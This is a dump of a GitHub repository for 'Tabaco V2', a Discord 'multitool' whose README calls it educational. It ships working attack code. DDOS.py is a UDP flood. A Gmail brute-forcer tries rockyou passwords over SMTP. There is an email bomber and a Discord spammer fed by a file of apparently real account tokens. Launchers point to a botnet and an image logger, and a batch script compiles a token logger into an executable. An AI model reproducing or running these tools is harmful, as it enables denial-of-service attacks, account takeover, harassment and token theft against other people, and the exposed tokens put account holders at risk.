├── README.md └── Tabaco V2 ├── SETUP.bat ├── START.bat ├── Tools ├── Available.txt ├── BotNetDDOS.py ├── BuildExe.bat ├── DDOS.py ├── Discord Spam.py ├── Discord Spam │ ├── DiscordSpam.py │ ├── assets │ │ ├── proxies.txt │ │ ├── tokens.txt │ │ └── userAgents.txt │ └── spammers │ │ ├── __init__.py │ │ ├── __pycache__ │ │ ├── __init__.cpython-310.pyc │ │ ├── assetsManager.cpython-310.pyc │ │ ├── banner.cpython-310.pyc │ │ ├── color.cpython-310.pyc │ │ ├── friendRequester.cpython-310.pyc │ │ ├── guildLeaver.cpython-310.pyc │ │ ├── messageSpammer.cpython-310.pyc │ │ └── voicechannelJoiner.cpython-310.pyc │ │ ├── assetsManager.py │ │ ├── banner.py │ │ ├── color.py │ │ ├── friendRequester.py │ │ ├── guildLeaver.py │ │ ├── messageSpammer.py │ │ └── voicechannelJoiner.py ├── Email Spam.py ├── Gmail BruteForce.py ├── ID To Token.py ├── IP Pinger.py ├── ImageLogger.py ├── NG │ ├── config │ │ ├── config.json │ │ └── proxies.txt │ ├── main.py │ └── results │ │ └── hit.txt ├── NitroCheck.py ├── NitroGen.py ├── Server Nuker.py ├── ServerJoiner.py ├── Stresser.py ├── Token Checker.py ├── Token Gen │ ├── Generated.txt │ ├── TokenGen.py │ └── Tokens.txt ├── TokenGen.py ├── TokenLog.py ├── TokenLogger.py ├── TokenbruteForce.py ├── Vanity Checker.py ├── Vanitys.txt ├── WORKED TOKENS.txt ├── WebhookSpam.py ├── proxies.txt ├── rockyou.txt └── workedCodes.txt └── menu.py /README.md: -------------------------------------------------------------------------------- 1 |
2 |

🟢Tabaco V2 Discord Multitool🟢

3 |

🟢Discord Tool made bye a rookie python scripter🟢

4 |

✏️For Educational Purpose Only + i just got board and made a tool i do this for fun i dont take it seriously✏️

5 | 6 | 7 | 8 | 🚧EVERYONE I HAVE DISCONTINUED MAKING THIS TOOL DUE TO THE FACT I CANT BE ASKED DO WHAT U WANT WITH IT STEAL MY CODE IDC🚧 9 | 10 | 🚧I AM NOT RESPONSIBLE FOR ANY DAMEGE DELT WITH THIS SCRIPT LIKE BRO AINT MY FAULT SOME SCRIPT SKID DOXED U WITH THIS🚧 11 | 12 | ![output-onlinegiftools](https://user-images.githubusercontent.com/129594730/231024879-abf1939a-03ad-4dae-ac00-da2e97eb9528.gif) 13 | 14 | 15 | 16 | 17 | 18 | ![carbon (1)](https://user-images.githubusercontent.com/111347467/230566365-bf9d61f0-edab-4e77-81f5-d00538265ca7.png) 19 | 20 | How to run Windows 21 | 22 | WARNING if it comes up as a virus its not its the token logger inside of the multitool that u can use 23 | 24 | 1 Go in the directory of Tabaco V2 25 | 26 | 2 Locate the SETUP.bat "Dont Run Start.bat first it wont work" 27 | 28 | 3 Run SETUP.bat 29 | 30 | 4 Run START.bat 31 | 32 | 5 enjoy 33 | 34 | Error or bug fixing 35 | 36 | If you get a error like this 37 | 38 | 39 | ![carbon (2)](https://user-images.githubusercontent.com/111347467/230567488-2ec726ce-21c5-4f65-a2f4-df19d3a543ed.png) 40 | 41 | Fix by putting this in cmd 42 | 43 | ![carbon (3)](https://user-images.githubusercontent.com/111347467/230567611-7030cc99-5db9-46d2-b984-ed0a078120a3.png) 44 | 45 | Or this 46 | 47 | ![carbon (4)](https://user-images.githubusercontent.com/111347467/230567667-539c8e5e-e698-43d8-a917-1a4e0a4204ad.png) 48 | 49 | if you get the error "Python was not found; run without arguments to install from the Microsoft Store, or disable this shortcut from Settings > Manage App Execution Aliases." 50 | 51 | go to microsoft store and install python 3.8 3.9 3.10 from the microsoft store then run SETUP.bat again 52 | 53 | If you are on mac or linux 54 | 55 | 56 | 1 install python with https://python.org need python 3.8 to 3.10 57 | 58 | 2 install pip 59 | 60 | ![carbon (5)](https://user-images.githubusercontent.com/111347467/230568632-09f7dc7f-763e-4f84-a07c-3651ce13592a.png) 61 | 62 | 3 Change the file name of setup.bat to setup.txt and such 63 | 64 | 4 open and copy all the pip install stuff and everything inside the .bat 65 | 66 | 5 paste into the setup.txt 67 | 68 | 6 open the tools not the menu.py just the tools 69 | 70 | 7 then you can start running the tools manully 71 | 72 | 8 enjoy 73 | 74 | 75 | 76 | 77 | 78 | 79 | Tabaco V2 is a discord multipurpose tool made for educational use only 80 | 81 | 82 | 83 | 84 | 85 | 📘for security reassons we do not promote hacking or stealing accounts or anything againts Discords TOS this is for educational use only📘 86 | 87 | 88 | 89 | 90 | 91 | 92 | ![output-onlinepngtools_1-modified_21](https://user-images.githubusercontent.com/111347467/230570471-41fb684f-c4b4-4ff4-b713-0072d3a841d3.png) 93 | 94 | 95 | Heres a Video On Tabaco ! 96 | 97 | https://www.youtube.com/watch?v=gtRdgsgn8fg&t=31s 98 | 99 | 100 | -------------------------------------------------------------------------------- /Tabaco V2/SETUP.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | pip install --upgrade pip 4 | 5 | setlocal 6 | 7 | set PYTHON38_URL=https://www.python.org/ftp/python/3.8.12/python-3.8.12-amd64.exe 8 | set PYTHON39_URL=https://www.python.org/ftp/python/3.9.12/python-3.9.12-amd64.exe 9 | set PYTHON310_URL=https://www.python.org/ftp/python/3.10.2/python-3.10.2-amd64.exe 10 | 11 | rem Check if Python 3.8 is installed 12 | python3.8 --version >nul 2>&1 13 | if %errorlevel% equ 0 ( 14 | echo Python 3.8 is already installed. 15 | ) else ( 16 | echo Installing Python 3.8... 17 | msiexec /i %PYTHON38_URL% /qn 18 | echo Python 3.8 installation complete. 19 | ) 20 | 21 | rem Check if Python 3.9 is installed 22 | python3.9 --version >nul 2>&1 23 | if %errorlevel% equ 0 ( 24 | echo Python 3.9 is already installed. 25 | ) else ( 26 | echo Installing Python 3.9... 27 | msiexec /i %PYTHON39_URL% /qn 28 | echo Python 3.9 installation complete. 29 | ) 30 | 31 | rem Check if pip is installed 32 | pip --version >nul 2>&1 33 | if %errorlevel% equ 0 ( 34 | echo pip is already installed. 35 | ) else ( 36 | echo Installing pip... 37 | curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py 38 | python get-pip.py 39 | echo pip installation complete. 40 | ) 41 | 42 | rem Check if Python 3.10 is installed 43 | python3.10 --version >nul 2>&1 44 | if %errorlevel% equ 0 ( 45 | echo Python 3.10 is already installed. 46 | ) else ( 47 | echo Installing Python 3.10... 48 | msiexec /i %PYTHON310_URL% /qn 49 | echo Python 3.10 installation complete. 50 | ) 51 | 52 | echo Installing required packages... 53 | 54 | pip install pysocks 55 | pip install smtplib 56 | pip install requests 57 | pip install random-package 58 | pip install colorama 59 | pip install discord 60 | pip install threading 61 | pip install asyncio 62 | pip install aiohttp 63 | pip install pathlib 64 | pip install psutil 65 | pip install colored 66 | pip install termcolor 67 | pip install webbrowser 68 | pip install httpx 69 | pip install pyotp 70 | pip install psutil 71 | pip install pypiwin32 72 | pip install pycryptodome 73 | pip install roblox 74 | pip install roblox-mod 75 | pip install pyinstaller>=5.0 76 | pip install PIL-tools 77 | pip install asyncio 78 | pip install ctypes 79 | pip install json 80 | pip install ntpath 81 | pip install os 82 | pip install random 83 | pip install re 84 | pip install shutil 85 | pip install sqlite3 86 | pip install subprocess 87 | pip install threading 88 | pip install winreg 89 | pip install zipfile 90 | pip install fade 91 | pip install colorama 92 | pip install fake-useragent 93 | pip install aiohttp 94 | pip install urllib3 95 | pip install requests 96 | pip install beautifulsoup4 97 | pip install pythonping 98 | pip install httpagentparser 99 | pip install cloudscraper 100 | pip install opentele 101 | pip install pyautogui 102 | pip install keyboard 103 | pip install pystyle 104 | pip install pyfiglet 105 | pip install PyJWT 106 | pip install Scapy 107 | pip install socket 108 | pip install pyinstaller 109 | pip install pygame 110 | 111 | echo All packages installed successfully. 112 | -------------------------------------------------------------------------------- /Tabaco V2/START.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | echo "Welcome Discord Hacker! Everything you do with this tool will be from your free will. We're not responsible for anything that happens to you" 4 | 5 | 6 | set /p answer="Do you want to continue (Y/N)? " 7 | 8 | if /i "%answer%"=="Y" ( 9 | echo "You chose to continue." 10 | ) else if /i "%answer%"=="N" ( 11 | echo "You chose to cancel." 12 | ) else ( 13 | echo "Invalid input." 14 | ) 15 | 16 | timeout /t 5 /nobreak 17 | 18 | python menu.py 19 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Available.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/BotNetDDOS.py: -------------------------------------------------------------------------------- 1 | import webbrowser 2 | 3 | # Set the URL of the GitHub page you want to open 4 | url = "https://github.com/skavngr/netbot" 5 | 6 | # Open the URL in your default web browser 7 | webbrowser.open_new_tab(url) 8 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/BuildExe.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | color 0a 3 | echo. 4 | set /p a="Enter the exe name : " 5 | if [%a%]==[] ( 6 | echo. 7 | echo bro enter a name 8 | pause 9 | EXIT /B 1 10 | ) 11 | if [%a%] NEQ [] ( 12 | echo. 13 | echo Name is: %a% 14 | python -m PyInstaller --clean --onefile TokenLog.py 15 | rmdir /s /q __pycache__ 16 | rmdir /s /q build 17 | del /f / s /q %a%.spec 18 | echo. 19 | echo generated exe as %a%.exe in the dist folder 20 | echo. 21 | pause 22 | EXIT /B 1 23 | ) -------------------------------------------------------------------------------- /Tabaco V2/Tools/DDOS.py: -------------------------------------------------------------------------------- 1 | from socket import socket, AF_INET, SOCK_DGRAM 2 | from threading import Thread 3 | from random import choices, randint 4 | from time import time, sleep 5 | 6 | class Brutalize: 7 | def __init__(self, ip, port, force, threads): 8 | self.ip = ip 9 | self.port = port 10 | self.force = force # default: 1250 11 | self.threads = threads # default: 35 12 | 13 | self.client = socket(family=AF_INET, type=SOCK_DGRAM) 14 | self.data = str.encode("x" * self.force) 15 | self.len = len(self.data) 16 | 17 | def flood(self): 18 | self.on = True 19 | self.sent = 0 20 | for _ in range(self.threads): 21 | Thread(target=self.send).start() 22 | Thread(target=self.info).start() 23 | 24 | def info(self): 25 | interval = 0.05 26 | now = time() 27 | 28 | size = 0 29 | self.total = 0 30 | 31 | bytediff = 8 32 | mb = 1000000 33 | gb = 1000000000 34 | 35 | while self.on: 36 | sleep(interval) 37 | if not self.on: 38 | break 39 | 40 | if size != 0: 41 | self.total += self.sent * bytediff / gb * interval 42 | print(f"{round(size)} Mb/s - Total: {round(self.total, 1)} Gb.", end='\r') 43 | 44 | now2 = time() 45 | 46 | if now + 1 >= now2: 47 | continue 48 | 49 | size = round(self.sent * bytediff / mb) 50 | self.sent = 0 51 | 52 | now += 1 53 | 54 | def stop(self): 55 | self.on = False 56 | 57 | def send(self): 58 | while self.on: 59 | try: 60 | self.client.sendto(self.data, self._randaddr()) 61 | self.sent += self.len 62 | except: 63 | pass 64 | 65 | def _randaddr(self): 66 | return (self.ip, self._randport()) 67 | 68 | def _randport(self): 69 | return self.port or randint(1, 65535) 70 | 71 | 72 | def main(): 73 | print("UDP Flood Attack") 74 | print("-----------------------------") 75 | print() 76 | 77 | ip = input("Enter the IP to hit: ") 78 | port = input("Enter port (Or Enter for Defult): ") 79 | force = input("Bytes per packet (Or Enter For Defult): ") 80 | threads = input("Threads (Or Enter For Defult): ") 81 | 82 | if force == '': 83 | force = 1250 84 | else: 85 | try: 86 | force = int(force) 87 | except ValueError: 88 | print("Invalid input. Bytes per packet should be an integer.") 89 | return 90 | 91 | if threads == '': 92 | threads = 35 93 | else: 94 | try: 95 | threads = int(threads) 96 | except ValueError: 97 | print("Invalid input. Threads should be an integer.") 98 | return 99 | 100 | print(f"\nStarting attack on {ip}.") 101 | brute = Brutalize(ip, port, force, threads) 102 | try: 103 | brute.flood() 104 | except: 105 | brute.stop() 106 | print("A fatal error has occurred and the attack was stopped.") 107 | return 108 | 109 | try: 110 | while True: 111 | sleep(1000000) 112 | except KeyboardInterrupt: 113 | brute.stop() 114 | print(f"Attack stopped. {ip} was Hit with {round(brute.total, 1)} Gb.\n") 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | # Change directory to the Token Gen folder 4 | os.chdir('Tools/Discord Spam') 5 | 6 | # Run the TokenGen.py script 7 | os.system('python DiscordSpam.py') 8 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/DiscordSpam.py: -------------------------------------------------------------------------------- 1 | import spammers as s 2 | from spammers import color 3 | 4 | s.banner(text="") 5 | 6 | print(""" 7 | 8 | 9 | 10 | 1: Friend Request Sender 11 | 2: Guild Leaver 12 | 3: Message Sender 13 | 4: Shows the help message. 14 | 5: Exit 15 | 16 | """) 17 | 18 | while True: 19 | _input = str(input(f"{color.YELLOW}[?] > {color.RESET_ALL}").lower()) 20 | 21 | if _input == "1": 22 | userid = input(f"{color.YELLOW}[?] Enter the ID of the user you want to send a friend request to > {color.RESET_ALL}").lower() 23 | for tokens in s.tokens(): 24 | s.friend_request(token = tokens , userid = userid , userAgent = s.userAgent() , proxies = s.proxies()) 25 | print(f"{color.GREEN}The transaction is finished. {color.RESET_ALL}") 26 | 27 | elif _input == "10000": 28 | print("Not working unless you have hCaptcha bypass") 29 | 30 | 31 | 32 | elif _input == "2": 33 | guildid = input(f"{color.YELLOW}[?] Enter the ID of the server you want to leave > {color.RESET_ALL}").lower() 34 | for tokens in s.tokens(): 35 | s.leave_guild(token = tokens , guildid=guildid , userAgent=s.userAgent() , proxies=s.proxies()) 36 | print(f"{color.GREEN}The transaction is finished. {color.RESET_ALL}") 37 | 38 | 39 | elif _input == "3": 40 | channelid = input(f"{color.YELLOW}[?] Enter the ID of the channel you will message > {color.RESET_ALL}").lower() 41 | message = input(f"{color.YELLOW}[?] enter message > {color.RESET_ALL}").lower() 42 | for tokens in s.tokens(): 43 | s.send_message(token = tokens , channelid = channelid , message = message , userAgent = s.userAgent() , proxies=s.proxies()) 44 | print(f"{color.GREEN}The transaction is finished. {color.RESET_ALL}") 45 | 46 | elif _input == "4": 47 | print("Simply put the tokens in the ./assets/tokens.txt file.") 48 | 49 | elif _input == "5": 50 | quit() 51 | 52 | else: 53 | print(f"{color.RED}[-]Invalid options. {color.RESET_ALL}") 54 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/assets/tokens.txt: -------------------------------------------------------------------------------- 1 | NzgyNTU0MjczNzQ1NDY5NDQy.X8N4sg.P1VYa1U8rbGv42OnnSQC5XZBqfM 2 | NzgyNTU0OTIwMDg2Nzk4MzY4.X8N5Rw.V3eQj7N6rqjtpxqOD5dxvpsQ9tc 3 | NzgyNTU1NTUwMjY0NzIxNDU3.X8N53w.bjfJYYRpcKaGAYduTxCpUG0HkrM 4 | NzgyNTU2MTgzODIyMjA0OTM5.X8N6dA.LQZQAfBN9ZPAjv8-GdWOSwIpxPE 5 | NzgyNTU2ODAwMTk2NjczNTU4.X8N7CQ.kowd2RFgu_iaOlmCvZk2aXBDzKY 6 | NzgyNTU3NjgzMjU3NTczMzk2.X8N72Q.A7SZlVYrlaV2fobhtrAwD63SroM -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__init__.py: -------------------------------------------------------------------------------- 1 | from .assetsManager import * 2 | from .banner import * 3 | from .color import * 4 | from .friendRequester import * 5 | from .guildLeaver import * 6 | from .messageSpammer import * 7 | from .voicechannelJoiner import * -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/__init__.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/__init__.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/assetsManager.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/assetsManager.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/banner.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/banner.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/color.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/color.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/friendRequester.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/friendRequester.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/guildLeaver.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/guildLeaver.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/messageSpammer.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/messageSpammer.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/__pycache__/voicechannelJoiner.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GoobGub/Tabaco-V2/3750d41ef816c28190db023dc47b9d581f4eab50/Tabaco V2/Tools/Discord Spam/spammers/__pycache__/voicechannelJoiner.cpython-310.pyc -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/assetsManager.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | def userAgent(): 4 | """UserAgents""" 5 | with open("./assets/userAgents.txt" , encoding="utf-8") as f: 6 | return random.choice(f.readlines()).split("\n")[0] 7 | 8 | def proxies(): 9 | """Proxies""" 10 | with open("./assets/proxies.txt" , encoding="utf-8") as f: 11 | return random.choice(f.readlines()).split("\n")[0] 12 | 13 | def tokens(): 14 | """Tokens""" 15 | tokens = [] 16 | with open("./assets/tokens.txt" , encoding="utf-8") as f: 17 | for i in f.readlines(): 18 | tokens.append(i.split("\n")[0]) 19 | return tokens -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/banner.py: -------------------------------------------------------------------------------- 1 | from .color import color 2 | 3 | try: 4 | import pyfiglet 5 | except ImportError: 6 | print( 7 | f"{color.RED}[-] Please download the pyfiglet module{color.RESET_ALL}. eg: pip install pyfiglet" 8 | ) 9 | quit() 10 | 11 | 12 | def banner(text: str) -> str: 13 | banner = pyfiglet.figlet_format(text, font="slant") 14 | return print(banner) 15 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/color.py: -------------------------------------------------------------------------------- 1 | class color: 2 | GREEN = '\033[92m' 3 | YELLOW = '\033[93m' 4 | RED = '\033[91m' 5 | RESET_ALL = '\033[0m' -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/friendRequester.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from .assetsManager import * 3 | from .color import color 4 | 5 | def friend_request(token : str , userid : str , userAgent: str , proxies : str) -> str: 6 | """Sends a friend request to the person whose ID you enter""" 7 | headers = {"content-type": "application/json", "authorization": token , "User-Agent" : userAgent} 8 | proxies = {"http" : proxies} 9 | try: 10 | x = requests.put(f"https://discordapp.com/api/v7/users/@me/relationships/{userid}" , headers=headers , proxies=proxies) 11 | except Exception as err: 12 | print(f"{color.RED}[-] ERROR: {color.RESET_ALL} {err}") 13 | if x.status_code == 204: 14 | print(f"{color.GREEN}[+] Friend request sent successfully. {color.RESET_ALL}") 15 | else: 16 | print(f"{color.RED}[-] Failed to send friend request {color.RESET_ALL} {x.json()}") 17 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/guildLeaver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from .assetsManager import * 3 | from .color import color 4 | 5 | def leave_guild(token : str , guildid : str , userAgent: str , proxies : str) -> str: 6 | """It leaves the server where you entered the ID.""" 7 | headers = {"content-type": "false", "authorization": token , "User-Agent" : userAgent} 8 | proxies = {"http" : proxies} 9 | try: 10 | x = requests.delete(f"https://discordapp.com/api/v7/invite/{guildid}" , headers=headers , proxies=proxies) 11 | except Exception as err: 12 | print(f"{color.RED}[-] ERROR: {color.RESET_ALL} {err}") 13 | if x.status_code == 204: 14 | print(f"{color.GREEN}[+] Successfully left the server. {color.RESET_ALL}") 15 | else: 16 | print(f"{color.RED}[-] Could not leave the server. {color.RESET_ALL} {x.json()}") 17 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/messageSpammer.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from .assetsManager import * 3 | from .color import color 4 | 5 | def send_message(token : str , channelid : str , message : str , userAgent: str , proxies : str) -> str: 6 | """It sends the message you want to the channel whose ID you entered.""" 7 | headers = {"content-type": "application/json", "authorization": token , "User-Agent" : userAgent , "content" : message , "tts" : "false"} 8 | proxies = {"http" : proxies} 9 | try: 10 | x = requests.post(f"https://discordapp.com/api/v7/channels/{channelid}/messages" , headers=headers , proxies=proxies) 11 | except Exception as err: 12 | print(f"{color.RED}[-] ERROR: {color.RESET_ALL} {err}") 13 | if x.status_code == 200: 14 | print(f"{color.GREEN}[+] Message sent successfully. {color.RESET_ALL}") 15 | else: 16 | print(f"{color.RED}[-] Message could not be sent. {color.RESET_ALL} {x.json()}") 17 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Discord Spam/spammers/voicechannelJoiner.py: -------------------------------------------------------------------------------- 1 | #soon -------------------------------------------------------------------------------- /Tabaco V2/Tools/Email Spam.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import smtplib 4 | import getpass 5 | 6 | W = '' # White 7 | R = '' # Red 8 | G = '' # Green 9 | 10 | if os.name == 'nt': # Windows 11 | os.system('cls') 12 | else: # Linux/Unix/MacOS 13 | os.system('clear') 14 | 15 | server = input('Mail-Server Gmail/Yahoo: ') 16 | 17 | if server.lower() == 'gmail': 18 | 19 | smtp_server = 'smtp.gmail.com' 20 | port = 587 21 | set_server = 'gmail' 22 | 23 | elif server.lower() == 'yahoo': 24 | 25 | smtp_server = 'smtp.mail.yahoo.com' 26 | port = 25 27 | set_server = 'yahoo' 28 | 29 | else: 30 | 31 | print(R + 'Error - This script only works on Gmail or Yahoo.' + W) 32 | sys.exit() 33 | 34 | email_user = input('Email: ') 35 | passwd = getpass.getpass('Password: ') 36 | email_to = input('\nTo: ') 37 | subject = input('Subject: ') 38 | body = input('Message: ') 39 | total = int(input('Amount of Sendings: ')) 40 | 41 | try: 42 | 43 | server = smtplib.SMTP(smtp_server, port) 44 | server.ehlo() 45 | 46 | if set_server == 'gmail': 47 | server.starttls() 48 | 49 | server.login(email_user, passwd) 50 | 51 | print('\n\n\n - Target : {} -\n'.format(email_to)) 52 | 53 | for i in range(1, total + 1): 54 | 55 | msg = 'From: ' + email_user + '\nSubject: ' + subject + '\n' + body 56 | 57 | server.sendmail(email_user, email_to, msg) 58 | 59 | print(G + '\rEmail Sent - {}'.format(i)) 60 | 61 | sys.stdout.flush() 62 | 63 | server.quit() 64 | 65 | print(R + '\n\n-Proccess Terminated-' + W) 66 | 67 | 68 | except KeyboardInterrupt: 69 | 70 | print(R + '\nError - Keyboard Interrupt' + W) 71 | sys.exit() 72 | 73 | except smtplib.SMTPAuthenticationError: 74 | 75 | print(R + '\nError - Authentication error, Are you sure the password or the username is correct?' + W) 76 | sys.exit() 77 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/Gmail BruteForce.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | import sys 3 | from os import system 4 | from termcolor import colored 5 | 6 | def artwork(): 7 | print("\n") 8 | print(colored(''' 9 | ▄▄█▀▀▀█▄█ ▄██ ▄▄█▀▀▀█▄█ ▄██ 10 | ▄██▀ ▀█ ██ ▄██▀ ▀█ ██ 11 | ██▀ ▀ ▄██▀██▄ ▄██▀██▄ ██▄████▄ ██▀ ▀▀███ ▀███ ██▄████▄ 12 | ██ ██▀ ▀████▀ ▀██ ██ ▀████ ██ ██ ██ ▀██ 13 | ██▄ ▀██████ ████ ██ ██ ████▄ ▀████ ██ ██ ██ ██ 14 | ▀██▄ ██ ██▄ ▄████▄ ▄██ ██▄ ▄██▀██▄ ██ ██ ██ ██▄ ▄██ 15 | ▀▀███████ ▀█████▀ ▀█████▀ █▀█████▀ ▀▀███████ ▀████▀███▄ █▀█████▀ 16 | 17 | GoobGub Brute Force 18 | ''', "green")) 19 | 20 | artwork() 21 | 22 | smtpserver = smtplib.SMTP("smtp.gmail.com", 587) 23 | 24 | smtpserver.ehlo() 25 | smtpserver.starttls() 26 | 27 | user = input("Enter The Target Gmail Adress => ") 28 | 29 | print("\n") 30 | 31 | pwd = input("Enter '0' to use the inbuilt passwords list \nEnter '2' to Add a custom password list\n => ") 32 | 33 | if pwd=='0': 34 | passswfile="rockyou.txt" 35 | 36 | elif pwd=='2': 37 | print("\n") 38 | passswfile = input("Name The File Path (For Password List) => ") 39 | 40 | else: 41 | print("\n") 42 | print("Invalid input!") 43 | sys.exit(1) 44 | try: 45 | passswfile = open(passswfile, "r") 46 | 47 | except Exception as e: 48 | print(e) 49 | sys.exit(1) 50 | 51 | for password in passswfile: 52 | try: 53 | smtpserver.login(user, password) 54 | 55 | print(colored("[+] Password Found %s" % password, "green")) 56 | break 57 | 58 | except smtplib.SMTPAuthenticationError: 59 | print(colored("[!] Wrong. %s " % password, "red")) -------------------------------------------------------------------------------- /Tabaco V2/Tools/ID To Token.py: -------------------------------------------------------------------------------- 1 | # Modules importation 2 | import os 3 | import base64 4 | try: 5 | from colorama import Fore, init 6 | except: 7 | os.system("py -m pip install colorama") 8 | from colorama import Fore, init 9 | init() 10 | 11 | userid = input("ID : ") 12 | encodedBytes = base64.b64encode(userid.encode("utf-8")) 13 | encodedStr = str(encodedBytes, "utf-8") 14 | print(f'\n FIRST PART : {encodedStr}') 15 | print("Control + C To Go back to Menu") 16 | os.system('pause >nul') -------------------------------------------------------------------------------- /Tabaco V2/Tools/IP Pinger.py: -------------------------------------------------------------------------------- 1 | import socket, threading 2 | import colorama 3 | import os 4 | import sys 5 | import fade 6 | import time 7 | 8 | faded_gui=fade.brazil(gui) 9 | print(faded_gui) 10 | def tcpping(ip,port): 11 | try: 12 | sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | sock.settimeout(1) 14 | sock.connect((ip,port)) 15 | print(f" {m}[{w}OK{m}] {g}Connection to {y}{ip} {lg}in port {y}{port} {lb}[{y}By Noxius{lb}] {m}[{w}OK{m}]") 16 | except: 17 | print(f" {m}[{w}HIT{m}] {r}Oops {y}{ip} {r}is down {lb}[{y}By Noxius{lb}]") 18 | 19 | ip = input(f"{m}[{w}>>>{m}] {black}IP:{y} ") 20 | print("") 21 | port = input(f"{m}[{w}>>>{m}] {black}Port:{y} ") 22 | print("") 23 | while True: 24 | try: 25 | os.system(f"Ping to {ip} in port {port} -") 26 | tcpping(ip,int(port)) 27 | time.sleep(0.25) 28 | except KeyboardInterrupt: 29 | exit(0) -------------------------------------------------------------------------------- /Tabaco V2/Tools/ImageLogger.py: -------------------------------------------------------------------------------- 1 | import webbrowser 2 | 3 | 4 | url1 = "https://www.youtube.com/watch?v=rFbiW2x4HEw" 5 | url2 = "https://github.com/dekrypted/discord-image-logger" 6 | 7 | 8 | while True: 9 | response = input("This will take you to the download and setup for the image logger are you sure you want to procced (Y/N)").lower() 10 | if response == 'y': 11 | break 12 | elif response == 'n': 13 | print("Exiting script...") 14 | exit() 15 | else: 16 | print("Invalid response. Please enter 'Y' or 'N'.") 17 | 18 | 19 | webbrowser.open_new_tab(url1) 20 | webbrowser.open_new_tab(url2) 21 | 22 | 23 | print("The image logger is made by my friend dekrypt.") 24 | -------------------------------------------------------------------------------- /Tabaco V2/Tools/NG/config/config.json: -------------------------------------------------------------------------------- 1 | {"proxies": "socks4", "thread": "200", "webhook": {"url": "https://discord.com/api/webhooks/0000000000000000000/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", "username": "Nitro Hits", "avatar": "https://cdn.discordapp.com/avatars/851905439809142856/6b09c26b7194e3aa7c84b7505a36a13e.webp?size=128"}, "url": "a"} -------------------------------------------------------------------------------- /Tabaco V2/Tools/NG/config/proxies.txt: -------------------------------------------------------------------------------- 1 | 80.154.203.122:8080 2 | 87.229.251.14:8081 3 | 154.16.63.16:3128 4 | 194.233.69.41:443 5 | 125.62.213.30:8000 6 | 005.252.161.48:8080 7 | 178.141.249.246:8081 8 | 191.96.42.80:8080 9 | 194.233.67.98:443 10 | 144.91.86.144:3128 11 | 64.124.38.140:8080 12 | 51.38.95.10:3128 13 | 54.237.111.226:3128 14 | 77.73.241.154:80 15 | 41.59.90.92:80 16 | 79.111.13.155:50625 17 | 87.238.209.26:8080 18 | 